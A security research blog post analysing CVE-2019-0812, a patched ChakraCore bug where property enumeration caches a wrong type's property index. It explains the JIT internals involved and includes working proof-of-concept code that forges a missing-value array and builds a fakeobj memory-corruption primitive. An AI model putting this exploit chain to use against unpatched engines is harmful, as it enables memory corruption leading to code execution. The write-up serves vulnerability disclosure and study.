Today we have our first blog post about CVE-2019-0812 with an honored guest and friend: S0rryMyBad. There has traditionally not been a lot of collaboration between the Chinese researcher community and other researchers. However since we are both addicted to ChakraCore we have been able to exchange ideas around throughout the last months and we are happy to present this blogpost written together today. We hope this can maybe lead to even more collaboration in the future!

The bug

As with other engines, JavaScript objects are represented internally as a DynamicObject and they do not maintain their own map of property names to property values. Instead, they only maintain the property values and have a field called type which points to a Type object which is able to map a property name to an index into the property values array.

In Chakra, JavaScript code is initially run through an interpreter before eventually being scheduled for JIT compilation if a function gets called repeatedly. In order to speed up the execution in the interpreter, certain operations like property reads and writes can be cached to avoid type lookups everytime a given property is accessed. Essentially these Cache objects associate a property name (internally a PropertyId) with an index to retrieve the property or write to it.

One of the operations that can lead to the use of such caches is property enumeration via for .. in loops. Property enumeration will eventually reach the following code inside the type handler (which is part of the object Type) for the object being enumerated:

template<size_t size>
BOOL SimpleTypeHandler<size>::FindNextProperty(ScriptContext* scriptContext, PropertyIndex& index, JavascriptString** propertyStringName,
    PropertyId* propertyId, PropertyAttributes* attributes, Type* type, DynamicType *typeToEnumerate, EnumeratorFlags flags, DynamicObject* instance, PropertyValueInfo* info)
{
    Assert(propertyStringName);
    Assert(propertyId);
    Assert(type);

    for( ; index < propertyCount; ++index )
    {
        PropertyAttributes attribs = descriptors[index].Attributes;
        if( !(attribs & PropertyDeleted) && (!!(flags & EnumeratorFlags::EnumNonEnumerable) || (attribs & PropertyEnumerable)))
        {
            const PropertyRecord* propertyRecord = descriptors[index].Id;

            // Skip this property if it is a symbol and we are not including symbol properties
            if (!(flags & EnumeratorFlags::EnumSymbols) && propertyRecord->IsSymbol())
            {
                continue;
            }

            if (attributes != nullptr)
            {
                *attributes = attribs;
            }

            *propertyId = propertyRecord->GetPropertyId();
            PropertyString * propStr = scriptContext->GetPropertyString(*propertyId);
            *propertyStringName = propStr;

            PropertyValueInfo::SetCacheInfo(info, propStr, propStr->GetLdElemInlineCache(), false);
            if ((attribs & PropertyWritable) == PropertyWritable)
            {
                PropertyValueInfo::Set(info, instance, index, attribs); // [[ 1 ]]
            }
            else
            {
                PropertyValueInfo::SetNoCache(info, instance);
            }
            return TRUE;
        }
    }
    PropertyValueInfo::SetNoCache(info, instance);

    return FALSE;
}

There are two interesting things to note: the first one is that at [[ 1 ]], the PropertyValueInfo is updated with the associated instance, index and attribs and also that this method is called with two Type objects: type and typeToEnumerate.

The PropertyValueInfo is then later used to create a Cache for that property in void CacheOperators::CachePropertyRead.

The peculiar thing to realize here is that in the FindNextProperty code, even though two Type objects are passed as parameters, the PropertyValueInfo object is updated in any case. What if those two types were different? Would that mean that the cache information would be updated for a wrong type?

It turns out that this is exactly what happens and the following PoC illustrates the behaviour:

function poc(v) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = v;
		tmp.x = 1;
	}
	return tmp.x;
}

console.log(poc(5));

If you take a look at this code you would expect it to print 1 but it will instead print 5. So it seems that by executing return tmp.x, it will fetch the effective value of property tmp.y.

This is coherent with the behaviour we expect to observe from our analysis of the FindNextProperty code: when we delete tmp.x and then set tmp.y and tmp.x, we end up with tmp.y at index 0 and tmp.x at index 1 in our object. However, in the initial type being enumerated, tmp.x is at index 0. So the cache info for the new type will be updated to say tmp.x is at offset 0 and do a direct index access when executing return tmp.x.

To exploit this non-JIT bug, as the title implies we will actually use the JIT compiler to assist us. We will need to introduce these concepts in order for this to make sense. This approach was S0rryMyBad’s idea, so all the props go to him.

Prerequisites

Inline Caching in JIT code

In a nutshell, to optimize property access, the JIT code can rely on Cache objects to generate a Type check sequence followed by a direct property access if the type matches. This essentially corresponds to the following sequence of instructions:

type = object.type
cachedType = Cache.cachedType
if type == cachedType:
    index = Cache.propertyIndex
    property = object.properties[index]
else:
    property = Runtime::GetProperty(object, propertyName)

Type Inference and range analysis in the JIT compiler

Chakra’s JIT compiler uses a forward pass algorithm to perform optimization when using the highest tier of the JIT compilers. This algorithm works on a control flow graph (CFG) and visits each block in forward direction. As the first step of processing a new block, the information gathered at each of its predecessors is merged.

One such piece of information is the type and the range of variables. Let’s highlight this behavior using the following example:

function opt(flag) {
    let tmp = {};
    tmp.x = 1;
    if (flag) {
        tmp.x = 2;
    }
    
    ...
}

This roughly corresponds to the following CFG:

function opt(flag) {
    // Block 1
    let tmp = {};
    tmp.x = 1;
    if (flag) {
    // End of Block 1, Successors 2, 3

        // Block 2: Predecessor 1    
        tmp.x = 2;
        // End of Block 2: Successor 3
    
    }

    // Block 3: Predecessors 1, 2
}

When the JIT starts to process block 3, it will merge the type information from block 1, which specifies that tmp.x is of type integer in the range [1,1], with the type information from block 2, specifying that tmp.x is of type integer in the range [2,2].

The union of these types is integer in the range [1,2] and will be assigned to the tmp.x value at the beginning of block 3.

Arrays in Chakra

Arrays are often the target of heavy optimizations – see our last blog post about a bug in JavaScriptCore due to this. In Chakra, most arrays have one of three different storage modes:

  • NativeIntArray: Each element is stored as an unboxed 4-byte integer.
  • NativeFloatArray: Each element is stored as an unboxed 8-byte floating point number.
  • JavascriptArray: Each element is stored in its default, boxed representation (1 is stored as 0x0001000000000001)

On top of this storage mode, the object will carry information about the array that can help for further optimizations. An infamous one is the HasNoMissingValues flag which indicates that every value between index 0 and length - 1 is set.

Missing values are magic values that are defined in RuntimeCommon.h as follows

    const uint64 VarMissingItemPattern = 0x00040002FFF80002;
    const uint64 FloatMissingItemPattern = 0xFFF80002FFF80002;
    const int32 IntMissingItemPattern = 0xFFF80002;

If you are able to create an array with a missing value and the HasNoMissingValues flag set, it is game over since readily available exploit techniques can be used from this point on.

BailOutConventionalNativeArrayAccessOnly

When optimizing an array store operation, the JIT will use type information to check if this store might produce a missing value. If the JIT cannot be sure that this won’t be the case, it will generate a missing value check with a bailout instruction.

These operations are represented by the StElem family of IR instructions and the above-mentioned decision will be made in the GlobOpt::TypeSpecializeStElem(IR::Instr ** pInstr, Value *src1Val, Value **pDstVal) method in GlobOpt.cpp. The code of this method is too big to include but the main logic is the following:

bool bConvertToBailoutInstr = true;
// Definite StElemC doesn't need bailout, because it can't fail or cause conversion.
if (instr->m_opcode == Js::OpCode::StElemC && baseValueType.IsObject())
{
    if (baseValueType.HasIntElements())
    {
        //Native int array requires a missing element check & bailout
        int32 min = INT32_MIN;
        int32 max = INT32_MAX;

        if (src1Val->GetValueInfo()->GetIntValMinMax(&min, &max, false)) // [[ 1 ]]
        {
            bConvertToBailoutInstr = ((min <= Js::JavascriptNativeIntArray::MissingItem) && (max >= Js::JavascriptNativeIntArray::MissingItem)); // [[ 2 ]]
        }
    }
    else
    {
        bConvertToBailoutInstr = false;
    }
}

We can see that it fetches the lower and upper bounds of the valueInfo at [[ 1 ]] and then checks whether or not the bailout can be removed (bConvertToBailoutInstr == false).

Chaining it together

We can use what we learned to create an array with a missing value that the engine is unaware of. To achieve this, we use our bug to generate a Cache with wrong information about the location of a certain property of an object. This in turn leads to wrong results of the type inference and range analysis performed by the JIT. We can thus allocate an array which the JIT infers cannot contain a missing value. It will therefore not generate the bailout, which we can abuse. The following piece of code illustrates this:

function opt(index) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = index;
		tmp.x = 1;
	}
	return [1, tmp.x - 524286]; // forge missing value 0xfff80002 [[ 1 ]]
}

for (let i = 0; i < 0x1000; i++) {
	opt(1);
}

evil = opt(0);
evil[0] = 1.1;

What happens in the above code is that the JIT assumes tmp.x to be in the range [1, 2] at [[ 1 ]]. It will then optimize the array creation to omit the bailout check we wrote about since it infers that neither 1 - 524286 nor 2 - 524286 are missing values. However by using our bug, tmp.x will effectively be 0 and therefore tmp.x - 524286 will be 0xfff80002 which is IntMissingItemPattern. We then just set a simple float to convert this array to a NativeFloatArray.

The below code highlights how easy it is to derive a fakeobj primitive from here:

var convert = new ArrayBuffer(0x100);
var u32 = new Uint32Array(convert);
var f64 = new Float64Array(convert);
var BASE = 0x100000000;

function hex(x) {
    return `0x${x.toString(16)}`
}

function i2f(x) {
    u32[0] = x % BASE;
    u32[1] = (x - (x % BASE)) / BASE;
    return f64[0];
}

function f2i(x) {
    f64[0] = x;
    return u32[0] + BASE * u32[1];
}

// The bug lets us update the CacheInfo for a wrong type so we can create a faulty inline cache.
// We use that to confuse the JIT into thinking that the ValueInfo for tmp.x is either 1 or 2
// when in reality our bug will let us write to tmp.x through tmp.y.
// We can use that to forge a missing value array with the HasNoMissingValues flag
function opt(index) {
	var tmp = new String("aa");
	tmp.x = 2;
	once = 1;
	for (let useless in tmp) {
		if (once) {
			delete tmp.x;
			once = 0;
		}
		tmp.y = index;
		tmp.x = 1;
	}
	return [1, tmp.x - 524286]; // forge missing value 0xfff80002
}

for (let i = 0; i < 0x1000; i++) {
	opt(1);
}

evil = opt(0);
evil[0] = 1.1;
// evil is now a NativeFloatArray with a missing value but the engine does not know it 


function fakeobj(addr) {
    function opt2(victim, magic_arr, hax, addr){
        let magic = magic_arr[1];
        victim[0] = 1.1;
        hax[0x100] = magic;   // change float Array to Var Array
        victim[0] = addr;   // Store unboxed double to Var Array
    }

    for (let i = 0; i < 10000; i++){
        let ary = [2,3,4,5,6.6,7,8,9];
        delete ary[1];
        opt2(ary, [1.1,2.2], ary, 1.1);
    }

    let victim = [1.1,2.2];

    opt2(victim, evil, victim, i2f(addr));
    return victim[0];
}
print(fakeobj(0x12345670));

Conclusion

The fix was published in the April servicing update in the following commit. As we saw, even though the bug was in the interpreter, JIT compilers give a level of freedom that can in some cases be used to abuse otherwise hard to exploit non-JIT bugs. We hope you enjoyed our blogpost 谢谢 :).